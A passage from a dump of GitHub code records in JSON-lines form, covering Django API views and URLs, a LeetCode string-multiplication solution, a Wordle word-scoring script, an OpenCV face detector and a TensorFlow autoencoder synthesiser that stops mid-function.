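            self.callback = callback

        @property
        def content(self):
            # Serialize on access; a callback turns plain JSON into JSONP,
            # as in JsonResponse.__get_container above.
            body = json.dumps({"data": self.data, "errors": self.errors})
            return f"{self.callback} ({body})" if self.callback else body

    print(JsonishResponse(data=[1, 2]).content)
    print(JsonishResponse(data=[1], callback="cb").content)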
'.join(errors)} or {},\n data=data,\n callback=callback,\n )\n\ndef savedsearchesbyIP(request):\n\n from accounts.models import AccountIPRange, SavedSearch, dqn_to_int\n\n callback = request.REQUEST.get('callback')\n ip = request.META['REMOTE_ADDR']\n\n int_ip = dqn_to_int(ip)\n\n data = []\n errors = {}\n\n try:\n account = AccountIPRange.objects.get(ip_min__lt=int_ip, ip_max__gt=int_ip)\n searches = SavedSearch.objects.get(owner=account.owner)\n data = searches.terms\n except AccountIPRange.DoesNotExist:\n errors = {\n 'code': 404,\n 'message': 'No account was found for the given IP range.'\n }\n except SavedSearch.DoesNotExist:\n errors = {\n 'code': 404,\n 'message': 'No saved searches were found for the account %s' % account.owner\n }\n\n return JsonResponse(\n errors=errors,\n data=data,\n callback=callback,\n )\n","repo_name":"snowcloud/engineclub","sub_path":"engineclub/apps/engine/resources/api_handlers.py","file_name":"api_handlers.py","file_ext":"py","file_size_in_byte":12742,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"42308689914","text":"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom petra import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('products/', views.ProductList.as_view(), name=\"product-list\"),\n path('products//',views.ProductDetail.as_view(), name=\"product-detail\"),\n path('signup/', views.Register.as_view(), name=\"signup\"),\n path('login/', TokenObtainPairView.as_view(), name=\"login\"),\n\n path('create/', views.Create.as_view(), name=\"create\"),\n path('update//', views.Update.as_view(), name='update'),\n path('delete//', views.Delete.as_view(), name='delete'),\n path('cart//', views.CartDetails.as_view(), name='cart-detail'),\n path('update/', views.CartUpdate.as_view(), name='cart-update')\n\n]\n\nurlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n\n","repo_name":"ahmedalsalman/PetraShop-DRF","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19798385143","text":"# Time Complexity: O(n1*n2)\n# Memory Complexity: O(n1+n2)\n# Where n1, n2 are len(num1), len(num2)\n\n\nclass Solution(object):\n def multiply(self, num1: str, num2: str) -> str:\n print(num1, num2)\n n1, n2 = len(num1), len(num2)\n result = [0] * (n1 + n2)\n num1 = [int(num1[i]) for i in range(n1)][::-1]\n num2 = [int(num2[i]) for i in range(n2)][::-1]\n\n for i in range(len(num1)):\n for j in range(len(num2)):\n result[i + j] += num1[i] * num2[j]\n result[i + j + 1] += result[i + j] // 10\n result[i + j] %= 10\n\n result = \"\".join([str(e) for e in result[::-1]]).lstrip(\"0\")\n return result if result != \"\" else \"0\"\n\n\n# print(Solution().multiply(\"123\", \"456\"))\n","repo_name":"Jakub-Domogala/LeetCode","sub_path":"2.medium/0043. Multiply Strings.py","file_name":"0043. 
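The Multiply Strings record just above uses the grade-school digit-by-digit scheme with carries propagated in place. The same loop kept minimal, for reference (multiply_digits is an illustrative name):

    def multiply_digits(a, b):
        # res[i + j] accumulates the product of the i-th and j-th digits
        # (least significant first); the carry spills into res[i + j + 1].
        res = [0] * (len(a) + len(b))
        for i, da in enumerate(map(int, reversed(a))):
            for j, db in enumerate(map(int, reversed(b))):
                res[i + j] += da * db
                res[i + j + 1] += res[i + j] // 10
                res[i + j] %= 10
        out = "".join(map(str, reversed(res))).lstrip("0")
        return out or "0"

    assert multiply_digits("123", "456") == "56088"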
Multiply Strings.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35742138881","text":"find_top = 13000\nmax_repeat_letters = 5\ntotal_value_dict = {}\npos1_value_dict = {}\npos2_value_dict = {}\npos3_value_dict = {}\npos4_value_dict = {}\npos5_value_dict = {}\ninput_file = \"wordle_best_\" + str(find_top) + \"_additions_recursive.txt\"\noutput_file = \"wordle_best_\" + str(find_top) + \"_additions_recursive.txt\"\ninput_guesses = \"wordle_guesses.txt\"\ntotal_freq_data = \"total_letter_frequency.txt\"\nposition1_data = \"position1_letter_frequency.txt\"\nposition2_data = \"position2_letter_frequency.txt\"\nposition3_data = \"position3_letter_frequency.txt\"\nposition4_data = \"position4_letter_frequency.txt\"\nposition5_data = \"position5_letter_frequency.txt\"\n\n\n# takes a string in the form of word1,word2,...,score, and returns the score as an int\ndef get_score(entry):\n entry_split = entry.split(\",\")\n return int(entry_split[-1].rstrip())\n\n\n# insert a string in the form of text,score into list in the appropriate spot\n# return the new lowest score in the list\ndef insert_in_order(list, text, score):\n # construct the string to insert\n inserted_text = text + \",\" + str(score) + \"\\n\"\n\n # iterate through list\n for index in range(len(list)):\n if get_score(list[index]) < score:\n list.insert(index, inserted_text)\n return get_score(list[-1])\n\n # If we get here it means the provided score is lower than every score in the list, so we should append\n list.append(inserted_text)\n return score\n\n\n# returns true if letter is in any of the words in list group, otherwise returns false\n# group is an element of group_list\ndef check_letter_in_group(group, letter):\n for k in range(len(group) - 1):\n if letter in group[k]:\n return True\n return False\n\n\n# returns true if letter is in position in any of the words in list group, otherwise returns false\n# group is an element of group_list\ndef check_letter_in_position_in_group(group, letter, position):\n for k in range(len(group) - 1):\n if letter == group[k][position]:\n return True\n return False\n\n\n# returns the value of letter in position\ndef get_positional_value(letter, position):\n if position == 0:\n return pos1_value_dict[letter]\n elif position == 1:\n return pos2_value_dict[letter]\n elif position == 2:\n return pos3_value_dict[letter]\n elif position == 3:\n return pos4_value_dict[letter]\n elif position == 4:\n return pos5_value_dict[letter]\n return 0\n\n\n# takes two lists of words and checks if they contain the same words\ndef check_if_duplicate(line_split1, line_split2):\n for word in line_split1:\n if word not in line_split2:\n return False\n return True\n\n\n# takes a string and returns the number of unique alphabetical letters in it\n# assumes input strings are in all upper or all lower case\ndef count_letters(line):\n count = 0\n for letter_index in range(len(line)):\n if line[letter_index].isalpha() and line[letter_index] not in line[:letter_index]:\n count = count + 1\n return count\n\n\n# given a list of groups of words and their scores, finds the find_top best words to add to each set to maximize it's\n# score\nif __name__ == '__main__':\n\n answered = False\n answer = 0\n\n while not answered:\n print(\"Press 1 for regular (easier to read) output, or press 2 for recursive output (In a format that allows \"\n \"this code to be ran on it again)\")\n answer = int(input())\n if answer == 1 or answer 
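insert_in_order in the wordle record above scans linearly for the insertion point. For large find_top values, bisect on a negated score key finds the slot in O(log n) comparisons; a sketch, assuming entries stay sorted by descending score (insert_scored is a hypothetical name):

    import bisect

    def insert_scored(entries, text, score):
        # entries is kept sorted by descending score; negating scores gives
        # an ascending key for bisect. Rebuilding the key list is O(n) here;
        # a real implementation would maintain it alongside entries.
        keys = [-s for _, s in entries]
        entries.insert(bisect.bisect_right(keys, -score), (text, score))
        return entries[-1][1]  # new lowest score, as in insert_in_order

    entries = []
    for word, score in [("arose", 10), ("slate", 14), ("crane", 12)]:
        lowest = insert_scored(entries, word, score)
    print(entries)  # [('slate', 14), ('crane', 12), ('arose', 10)]
    print(lowest)   # 10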
== 2:\n answered = True\n\n word_list = []\n group_list = []\n\n # stores the exact string from the file for later use\n original_group_list = []\n\n # stores the number of unique letters in the word combination at the respective index in group_list\n letter_count = []\n\n # fill the group list using the groups and scores from the file, as well as the unique letters list\n f = open(input_file, 'r')\n lines = f.readlines()\n\n # use the first line to get how many letters are in each line\n input_letters = 0\n for letter in lines[0]:\n if letter.isalpha():\n input_letters += 1\n\n print(\"Counting unique letters....\")\n for i in range(len(lines)):\n print(\"Counting \" + str(i) + \"/\" + str(len(lines)))\n original_group_list.append(lines[i])\n line_strip = lines[i].rstrip()\n letter_count.append(count_letters(line_strip))\n line_split = line_strip.split(',')\n group_list.append(line_split)\n\n f.close()\n\n # fill the word list\n f = open(input_guesses, 'r')\n lines = f.readlines()\n\n word_letters = 0\n # use the first word to get how many letters are in each word\n for letter in lines[0]:\n if letter.isalpha():\n word_letters += 1\n\n for line in lines:\n word_list.append(line.rstrip())\n\n f.close()\n\n # fill the total count dictionary\n f = open(total_freq_data, 'r')\n lines = f.readlines()\n for line in lines:\n line_strip = line.rstrip()\n line_split = line_strip.split(\":\")\n total_value_dict[line_split[0]] = int(line_split[1])\n\n f.close()\n\n # fill the position 1 count dictionary\n f = open(position1_data, 'r')\n lines = f.readlines()\n for line in lines:\n line_strip = line.rstrip()\n line_split = line_strip.split(\":\")\n pos1_value_dict[line_split[0]] = int(line_split[1])\n\n f.close()\n\n # fill the position 2 count dictionary\n f = open(position2_data, 'r')\n lines = f.readlines()\n for line in lines:\n line_strip = line.rstrip()\n line_split = line_strip.split(\":\")\n pos2_value_dict[line_split[0]] = int(line_split[1])\n\n f.close()\n\n # fill the position 3 count dictionary\n f = open(position3_data, 'r')\n lines = f.readlines()\n for line in lines:\n line_strip = line.rstrip()\n line_split = line_strip.split(\":\")\n pos3_value_dict[line_split[0]] = int(line_split[1])\n\n f.close()\n\n # fill the position 4 count dictionary\n f = open(position4_data, 'r')\n lines = f.readlines()\n for line in lines:\n line_strip = line.rstrip()\n line_split = line_strip.split(\":\")\n pos4_value_dict[line_split[0]] = int(line_split[1])\n\n f.close()\n\n # fill the position 5 count dictionary\n f = open(position5_data, 'r')\n lines = f.readlines()\n for line in lines:\n line_strip = line.rstrip()\n line_split = line_strip.split(\":\")\n pos5_value_dict[line_split[0]] = int(line_split[1])\n\n f.close()\n\n additions_list = []\n # iterate through every group\n for i in range(len(group_list)):\n\n print(\"Evaluating group: \" + original_group_list[i] + \" \" + str(i) + \"/\" + str(len(group_list)))\n # initialize the current score of the group as the minimum score\n group_score = int(group_list[i][-1])\n min_score = int(group_list[i][-1])\n top_additions = []\n\n # iterate through all words to find the best additions\n for word in word_list:\n\n score = group_score\n new_unique_letters = 0\n\n # iterate through all letters in word to get the score\n for j in range(len(word)):\n\n # if too many duplicate letters are found stop examining this word\n if (input_letters + j) - (letter_count[i] + new_unique_letters) > max_repeat_letters:\n break\n\n # check if this letter is in any of the words 
in the group\n if not check_letter_in_group(group_list[i], word[j]):\n score += get_positional_value(word[j], j)\n if word[j] not in word[0:j]:\n score += total_value_dict[word[j]]\n new_unique_letters += 1\n\n # check if this letter is in the same position in any of the words in group\n elif not check_letter_in_position_in_group(group_list[i], word[j], j):\n score += get_positional_value(word[j], j)\n\n # do not add this word if it would cause the combination to repeat too many letters\n if (input_letters + word_letters) - (letter_count[i] + new_unique_letters) <= max_repeat_letters:\n\n # if the list still has room add this word to the list\n if len(top_additions) < find_top:\n min_score = insert_in_order(top_additions, word, score)\n\n # if score is greater than min score, remove the lowest scoring word and\n # add this word to top_additions in the appropriate spot\n elif score >= min_score:\n top_additions.pop(-1)\n min_score = insert_in_order(top_additions, word, score)\n\n # add the list of the best additions to additions_list, at the same index as the group\n additions_list.insert(i, top_additions)\n\n # write the file output\n\n if answer == 1:\n f = open(\"wordle_best_\" + str(find_top) + \"_additions.txt\", 'w')\n # iterate and write all the input groups\n for i in range(len(original_group_list)):\n f.write(original_group_list[i])\n\n # iterate and write the list of top additions\n for addition in additions_list[i]:\n f.write(\" \" + addition)\n f.close()\n\n # write the file output in the same format as an input file\n # this also sorts the output by score\n elif answer == 2:\n print(\"Creating output...\")\n output_lines = []\n for i in range(len(group_list)):\n start_line = \"\"\n for j in range(len(group_list[i]) - 1):\n start_line = start_line + group_list[i][j] + \",\"\n for addition in additions_list[i]:\n output_lines.append(start_line + addition)\n print(\"Sorting...\")\n output_lines.sort(key=get_score, reverse=True)\n\n output_lines = output_lines[:1000000]\n # eliminate combinations that have the same words as other combinations\n print(\"Eliminating duplicates...\")\n i = 0\n while i < len(output_lines):\n\n print(\"Checking \" + str(i) + \"/\" + str(len(output_lines)))\n\n line_split = output_lines[i].rstrip().split(',')\n\n j = i + 1\n while j < len(output_lines):\n\n line2_split = output_lines[j].rstrip().split(',')\n # if scores are not the same don't check any further into the list\n if line2_split[-1] != line_split[-1]:\n break\n # if duplicate found remove it\n elif check_if_duplicate(line_split[:-1], line2_split[:-1]):\n output_lines.pop(j)\n j = j - 1\n\n j = j + 1\n\n i = i + 1\n\n print(\"Writing...\")\n f = open(output_file, 'w')\n f.writelines(output_lines)\n f.close()\n","repo_name":"nunesale/wordleoptimization","sub_path":"wordle_best_addition.py","file_name":"wordle_best_addition.py","file_ext":"py","file_size_in_byte":10843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34268252952","text":"import json\nimport cv2\nimport numpy as np\n\nframe = 0\ncascPath = 'processing/haarcascade_frontalface_alt2.xml'\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\ndef process(data):\n\tnparr = np.frombuffer(data, np.uint8)\n\timg_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n\tgray = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)\n\n\tfaces = faceCascade.detectMultiScale(\n\t\tgray,\n\t\tscaleFactor=1.1,\n\t\tminNeighbors=10,\n\t\tminSize=(50, 50),\n\t\tflags=cv2.cv.CV_HAAR_SCALE_IMAGE\n\t)\n\tfor (x, y, w, 
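face.py above passes flags=cv2.cv.CV_HAAR_SCALE_IMAGE, which only exists in the old OpenCV 2.x bindings; on OpenCV 3/4 the cv2.cv namespace is gone. A sketch of the same detection under the modern API (face.jpg is a hypothetical input; the bundled cascade path comes from the opencv-python package):

    import cv2

    cascade = cv2.CascadeClassifier(
        cv2.data.haarcascades + "haarcascade_frontalface_alt2.xml"
    )
    img = cv2.imread("face.jpg")  # hypothetical input file
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    faces = cascade.detectMultiScale(
        gray, scaleFactor=1.1, minNeighbors=10, minSize=(50, 50),
        flags=cv2.CASCADE_SCALE_IMAGE,  # modern spelling of the 2.x flag
    )
    for (x, y, w, h) in faces:
        cv2.rectangle(img, (x, y), (x + w, y + h), (0, 200, 100), 10)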
h) in faces:\n\t\tcv2.rectangle(img_np, (x, y), (x+w, y+h), (0, 200, 100), 10)\n\t\n\tparam = [int(cv2.IMWRITE_PXM_BINARY),1]\n\tret, buf = cv2.imencode(\".ppm\", img_np, param)\n\tresimg = buf.tobytes()\n\treturn bytearray(resimg)","repo_name":"farisais/online-videostream-processing","sub_path":"processing/face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"22976544865","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport os\nimport librosa\nimport scipy as sci\nimport soundfile as sf\nfrom time import time\n\n\ndef do_rtpghi_gaussian_window(mag, len_window, hop_length_):\n threshold = 1e-3\n pie = np.pi\n relative_height = 0.01\n width_ = (len_window / 2) / np.sqrt(-2 * np.log(relative_height))\n gaussian_window = sci.signal.get_window(('gaussian', width_), len_window)\n mag = np.clip(mag, threshold, None)\n log_mag = np.log(mag)\n qwe = np.shape(log_mag)\n recon_phase_der = np.zeros(qwe)\n # np.random.uniform(low=0,high=2*pie,size=qwe)\n recon_phase_output = np.zeros(qwe)\n M_freqs = qwe[0]\n N_frames = qwe[1]\n freq_time_ratio = -1 * (pie / 4) * \\\n (np.power(len_window, 2) / np.log(relative_height))\n scale_constant_6 = (hop_length_ * M_freqs) / (-2 * freq_time_ratio)\n\n # This is Equation 6 from the paper, which requires no look-ahead frames\n for ii in range(1, M_freqs - 1):\n recon_phase_der[ii,\n :] = scale_constant_6 * (log_mag[ii + 1,\n :] - log_mag[ii - 1,\n :]) + (pie * hop_length_ * ii / (M_freqs))\n for jj in range(1, N_frames - 1):\n bins_to_randomize = mag[:, jj] == threshold\n recon_phase_output[:, jj] = recon_phase_output[:, jj - 1] + \\\n 0.5 * (recon_phase_der[:, jj - 1] + recon_phase_der[:, jj])\n #recon_phase_output[bins_to_randomize,jj] = np.random.uniform(low=0,high=2*pie,size=np.shape(log_mag[mag[:,jj]==threshold,jj]))\n E = mag * np.exp(1j * recon_phase_output)\n return librosa.istft(E, hop_length=hop_length_)\n\n# Topology AutoEncoder:\n# Generating weights for the fully connected layers fc- refers to the -th\n# fully connected layer's neuron width\n\n\nclass Topology:\n def __init__(self, input_size):\n # Calculated Below\n self.fc = np.zeros((3)).astype(int)\n self.b = {}\n self.W_fc = {}\n self.output_size = 2049\n self.input_size = input_size\n\n # Constant Values belonging to topology:\n self.chkpt_name = 'checkpoints'\n self.min_HL = 16\n self.epochs = 300 # Number of epochs the ANN is trained for - 300 should be sufficient\n # ADAM learning rate - 1e-3 was found to produce robust ANNs\n self.learning_rate_adam = 1e-3\n self.l2_lamduh = 1e-16 # Lamda value for L1 Regularization\n self.batch_size = 200 # Typical batch size for ADAM useage\n # self.fc = [256,self.min_HL,256]\n self.fc = [256, 64, self.min_HL, 64, 256]\n\n # for i in range(3):\n # \tself.b[i] =self.getBiasVariable(self.fc[i],'b_' + str(i))\n # self.b[3] = self.getBiasVariable(self.output_size,'b_3')\n for i in range(5):\n self.b[i] = self.getBiasVariable(self.fc[i], 'b_' + str(i))\n self.b[5] = self.getBiasVariable(self.output_size, 'b_5')\n\n # Making weight variables\n # self.W_fc[0] = self.getWeightVariable([self.input_size, self.fc[0]],'W_fc1')\n # for i in range(1,3):\n # \tself.W_fc[i] = self.getWeightVariable([self.fc[i - 1],self.fc[i]],'W_fc' + str(i + 1))\n # self.W_fc[3] = self.getWeightVariable([self.fc[2], self.output_size],'W_fc4')\n\n self.W_fc[0] = 
self.getWeightVariable(\n [self.input_size, self.fc[0]], 'W_fc1')\n for i in range(1, 5):\n self.W_fc[i] = self.getWeightVariable(\n [self.fc[i - 1], self.fc[i]], 'W_fc' + str(i + 1))\n self.W_fc[5] = self.getWeightVariable(\n [self.fc[4], self.output_size], 'W_fc6')\n\n def getBiasVariable(self, shape_, name_):\n # Initialized with a truncated normal random variable\n initial = tf.truncated_normal([shape_], name=name_, stddev=0.15)\n return tf.Variable(initial)\n\n # Creates weight variables for the ANN and groups them in a collection for\n # use in L2 regularization\n def getWeightVariable(self, shape_, name_):\n # Initialized with a truncated normal random variable\n initial = tf.truncated_normal(shape_, name=name_, stddev=0.15)\n # Adding to L2 collection, summing squares\n tf.add_to_collection('l2', tf.reduce_sum(tf.pow(initial, 2)))\n return tf.Variable(initial)\n\n\nclass OperationMode:\n def __init__(\n self,\n train=False,\n new_init=False,\n validation=False,\n control=False,\n bias=False):\n self.train = train\n self.new_init = new_init\n self.validation = validation\n self.control = control\n self.bias = bias\n\n\nclass ANNeSynth:\n def __init__(self, operationMode, corpus, loss_choice='sc'):\n self._operationMode = operationMode\n self._corpus = corpus\n self._loss_choice = loss_choice\n self._sess = tf.Session()\n\n # Load the stft so we have an input_size (from the topology)\n self.loadDataSet()\n\n # Generating placeholders for the input and label data\n self.x_ = tf.placeholder(\n tf.float32, shape=[\n None, self.topology.input_size])\n self.y_ = tf.placeholder(\n tf.float32, shape=[\n None, self.topology.output_size])\n self.controller = tf.placeholder(\n tf.float32, shape=[\n None, self.topology.min_HL])\n ##\n self.makeTensorFlowLayers()\n\n def loadDataSet(self):\n # Loading 95,443 Magnitude STFT frames saved as .npy (Loading in data)\n filename = self._corpus # Static Data used for training net\n data_path = os.path.join(os.getcwd(), filename)\n self.frames = np.load(data_path)\n self.frames = np.asarray(self.frames)\n self.validate = self.frames[42500:, :]\n self.topology = Topology(np.shape(self.frames)[1])\n\n def recurseThroughLayer(self, layer, i, desired_stop):\n Product = tf.matmul(layer, self.topology.W_fc[i])\n\n if(self._operationMode.bias):\n new_layer = tf.nn.relu(tf.add(Product, self.topology.b[i]))\n else:\n new_layer = tf.nn.relu(tf.add(Product, 0))\n\n if(i == desired_stop):\n return new_layer\n else:\n return self.recurseThroughLayer(new_layer, i + 1, desired_stop)\n\n def makeTensorFlowLayers(self):\n # Making the tensorflow layers from bias and weight variables\n # initialLayer = tf.nn.relu(tf.add(tf.matmul(self.x_, self.topology.W_fc[0]),0))\n # initialLayer2 = tf.nn.relu(tf.add(tf.matmul(self.controller, self.topology.W_fc[2]),0))\n # self.modulators = tf.placeholder(tf.float32, shape=[None, self.topology.fc[1]])\n # self.outputLayer = self.recurseThroughLayer(initialLayer,1,3)\n # self.outputLayer2 = self.recurseThroughLayer(initialLayer2,3,3)\n\n initialLayer = tf.nn.relu(\n tf.add(\n tf.matmul(\n self.x_,\n self.topology.W_fc[0]),\n 0))\n initialLayer2 = tf.nn.relu(\n tf.add(\n tf.matmul(\n self.controller,\n self.topology.W_fc[3]),\n 0))\n self.modulators = tf.placeholder(\n tf.float32, shape=[\n None, self.topology.fc[2]])\n self.outputLayer = self.recurseThroughLayer(initialLayer, 1, 5)\n self.outputLayer2 = self.recurseThroughLayer(initialLayer2, 2, 5)\n\n def trainNeuralNetwork(self):\n # Splitting self.frames into different buffers\n 
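recurseThroughLayer above chains relu(x @ W + b) one layer at a time via recursion. The same forward pass written iteratively in plain NumPy, independent of the TF1 graph (forward is an illustrative name):

    import numpy as np

    def forward(x, weights, biases=None):
        # Each layer is relu(x @ W (+ b)); biases are optional, matching
        # the operationMode.bias switch in the class above.
        for i, W in enumerate(weights):
            x = x @ W
            if biases is not None:
                x = x + biases[i]
            x = np.maximum(x, 0.0)
        return x

    rng = np.random.default_rng(0)
    ws = [rng.normal(size=(8, 4)), rng.normal(size=(4, 8))]
    print(forward(rng.normal(size=(2, 8)), ws).shape)  # (2, 8)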
train = self.frames[:10000, :]\n test = self.frames[40000:42500, :]\n validate = self.frames[42500:, :]\n\n # Generating Parameters for the Neural Network and Initializing the Net\n # Number of batches per epoch\n total_batches = int(len(train) / self.topology.batch_size)\n l2 = tf.reduce_sum(tf.get_collection('l2'))\n # loss2 = tf.reduce_mean(tf.pow(y_ - output_, 2)) # MSE error\n\n subt = self.y_ - self.outputLayer\n arg1 = tf.pow(subt, 2)\n arg2 = tf.reduce_mean(tf.pow(self.y_, 2))\n # Spectral Convergence calculation for input and output magnitude STFT\n # frames\n self.loss2 = tf.divide(tf.reduce_mean(arg1), arg2)\n self.loss3 = tf.reduce_mean(arg1)\n self.loss4 = tf.reduce_mean(tf.abs(subt))\n loss_lookup = {'sc': self.loss2, 'mse': self.loss3, 'mae': self.loss4}\n loss = loss_lookup[self._loss_choice] + \\\n self.topology.l2_lamduh * l2 # Imposing L2 penalty\n\n train_step = tf.train.AdamOptimizer(\n self.topology.learning_rate_adam).minimize(loss)\n\n # Loads the trained neural network into memory\n if self._operationMode.new_init:\n self._sess.run(tf.global_variables_initializer())\n else:\n print('Loading')\n self._sess.run(tf.global_variables_initializer())\n ckpt = tf.train.latest_checkpoint(self.topology.chkpt_name)\n self.saver.restore(self._sess, ckpt)\n # Trains the neural net for the number of epochs specified above\n # Prints test accuracy every 10th epoch\n text_file = open(\"metrics.txt\", \"a\")\n for i in range(self.topology.epochs):\n # permuting the training data between epochs improves ADAM's\n # performance\n frames = np.random.permutation(train)\n for _ in range(total_batches):\n # Generates batch of size batch_size for training\n batch = frames[_ *\n self.topology.batch_size:_ *\n self.topology.batch_size +\n self.topology.batch_size]\n self._sess.run(train_step, feed_dict={\n self.x_: batch, self.y_: batch[:, 0:self.topology.output_size]})\n # Reshaping test array to fit with TF\n tes = np.reshape(test[:, :], [-1, self.topology.input_size])\n if i % 3 == 2:\n self.saver.save(\n self._sess,\n self.topology.chkpt_name +\n '/my-model',\n global_step=i)\n temp_value = self._sess.run(self.loss2, feed_dict={\n self.x_: tes, self.y_: test[:, 0:self.topology.output_size]})\n text_file.write('\\n%g' % i)\n text_file.write('\\ntest accuracy %g' % temp_value)\n #print('test accuracy %g'% self._sess.run(self.loss2, feed_dict={self.x_:tes, self.y_:test[:,0:self.topology.output_size]}))\n print('Training Complete \\n Evaluating Model')\n text_file.write('\\n%g' % i)\n val = np.reshape(validate[:, :], [-1, self.topology.input_size])\n temp_value = self._sess.run(self.loss2, feed_dict={\n self.x_: val, self.y_: validate[:, 0:self.topology.output_size]})\n text_file.write('\\nvalidation accuracy %g' % temp_value)\n text_file.close()\n self.plotTrainingFigures()\n\n def plotTrainingFigures(self):\n # Plots 5 examples of the ANN's output given a magnitude STFT frame as input as 5 separate pdfs\n # Dependent on the matplotlib library\n # This is not a good move DON'T KNOW WHY IT'S HERE\n test = np.asarray(self.validate)\n for disp in range(10):\n # X-axis for magnitude response\n x_axis = np.arange(self.topology.output_size)\n # Pulling frames from the 'test' batch for plotting\n orig = np.reshape(test[disp * 20 + 200, :],\n [-1, self.topology.input_size])\n orig_hat = np.reshape(self._sess.run(self.outputLayer, feed_dict={self.x_: orig}), [\n self.topology.output_size, -1]) # Processing frame using ANN\n plt.figure(1)\n plt.subplot(211)\n # Plots the original magnitude STFT 
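trainNeuralNetwork above permutes the training frames each epoch and slices fixed-size batches, dropping the ragged tail. That scheme as a reusable generator (iter_minibatches is a hypothetical name):

    import numpy as np

    def iter_minibatches(data, batch_size, shuffle=True):
        # Permute once per epoch, then yield contiguous slices; the
        # incomplete final batch is dropped, as in the original loop.
        if shuffle:
            data = np.random.permutation(data)
        total = len(data) // batch_size
        for b in range(total):
            yield data[b * batch_size:(b + 1) * batch_size]

    frames = np.arange(10).reshape(5, 2)
    for batch in iter_minibatches(frames, 2):
        print(batch.shape)  # (2, 2), twice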
frame\n plt.plot(x_axis, np.transpose(\n orig[:, 0:self.topology.output_size]), color='b')\n plt.ylim([0, 1.2])\n plt.subplot(212)\n # Plots the output magnitude STFT frame\n plt.plot(x_axis, orig_hat, color='r')\n plt.tight_layout()\n plt.ylim([0, 1.2])\n plotname = 'HL' + str(self.topology.fc[0]) + '-' + str(\n self.topology.fc[1]) + '-' + str(self.topology.fc[2]) + '-' + str(disp) + '.pdf'\n plt.savefig(plotname, format='pdf', bbox_inches='tight')\n plt.clf()\n print('Plotting Finished')\n\n def execute(self, values, filename='long'):\n self.saver = tf.train.Saver()\n if not self._operationMode.train:\n ckpt = tf.train.latest_checkpoint(self.topology.chkpt_name)\n self.saver.restore(self._sess, ckpt)\n else:\n self.trainNeuralNetwork()\n\n # Prints validation accuracy of the trained ANN\n if self._operationMode.validation:\n print('validation accuracy %g' % self._sess.run(self.loss2, feed_dict={\n self.x_: self.validate, self.y_: self.validate[:, 0:self.topology.output_size]}))\n\n if self._operationMode.control:\n len_window = 4096 # Specified length of analysis window\n hop_length = 1024 # Specified percentage hop length between windows\n t = time()\n n_frames = 750\n mag_buffer = np.zeros((self.topology.output_size, 1))\n activations = values[:, 0:8]\n print(values)\n for ii in range(n_frames):\n orig_hat = np.reshape(\n self._sess.run(\n self.outputLayer2, feed_dict={\n self.controller: activations}), [\n self.topology.output_size, -1])\n mag_buffer = np.hstack((mag_buffer, orig_hat))\n # *np.random.uniform(low=0.999, high=1.001, size=np.shape(mag_buffer))#+np.random.uniform(low=1,high=20,size=np.shape(mag_buffer))\n mag_buffer = 50 * mag_buffer\n bass_boost = (\n np.exp(\n np.linspace(\n 0.95, -0.95, self.topology.output_size)))\n for ii in range(n_frames):\n mag_buffer[:, ii] = np.roll(\n mag_buffer[:, ii], int(values[:, 8])) * bass_boost\n T = do_rtpghi_gaussian_window(\n mag_buffer, len_window, hop_length) # Initializes phase\n T = 0.8 * T / np.max(np.abs(T))\n crossfade_time = 0.35\n crossfade_time = int(crossfade_time * 44100)\n fade_in = np.log(np.linspace(1, 2.71, crossfade_time))\n fade_out = np.log(np.linspace(2.71, 1, crossfade_time))\n T[:crossfade_time] = fade_in * T[:crossfade_time] + \\\n fade_out * T[len(T) - crossfade_time:]\n U = T[:len(T) - crossfade_time]\n # Must be 16bit PCM to work with pygame\n sf.write(filename + '.wav', U, 44100, subtype='PCM_16')\n elapsed = time() - t\n print(\n 'Method took ' +\n str(elapsed) +\n ' seconds to process the whole file')\n print('The whole file is ' + str(len(U) / 44100) + ' seconds long')\n\n def load_weights_into_memory(self):\n self.saver = tf.train.Saver()\n ckpt = tf.train.latest_checkpoint(self.topology.chkpt_name)\n self.saver.restore(self._sess, ckpt)\n\n def play_synth(self, values, n_frames=300, LFO=0, filename='loop.wav'):\n len_window = 4096 # Specified length of analysis window\n hop_length = 1024 # Specified percentage hop length between windows\n mag_buffer = np.zeros((self.topology.output_size, 1))\n activations = values[:, 0:16]\n for ii in range(n_frames):\n orig_hat = np.reshape(\n self._sess.run(\n self.outputLayer2, feed_dict={\n self.controller: activations}), [\n self.topology.output_size, -1])\n mag_buffer = np.hstack((mag_buffer, orig_hat))\n if LFO > 0:\n current_activations = np.zeros((1, 16))\n mag_buffer = np.zeros((self.topology.output_size, 1))\n lfo_freq = LFO\n for ii in range(n_frames):\n current_activations[:, 0:4] = activations[:, 0:4] * \\\n (1.0 + 0.25 * np.sin(2 * np.pi * ii * lfo_freq 
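execute() above stitches the synthesized audio into a seamless loop by log-ramp crossfading the tail into the head before trimming. A standalone sketch of that crossfade (loop_crossfade is an illustrative name; np.e replaces the literal 2.71 used above):

    import numpy as np

    def loop_crossfade(signal, fade_samples):
        # fade_in ramps 0 -> 1 and fade_out ramps 1 -> 0 on a log curve;
        # blending the tail into the head hides the loop point, then the
        # tail is dropped, so the result is fade_samples shorter.
        fade_in = np.log(np.linspace(1.0, np.e, fade_samples))
        fade_out = np.log(np.linspace(np.e, 1.0, fade_samples))
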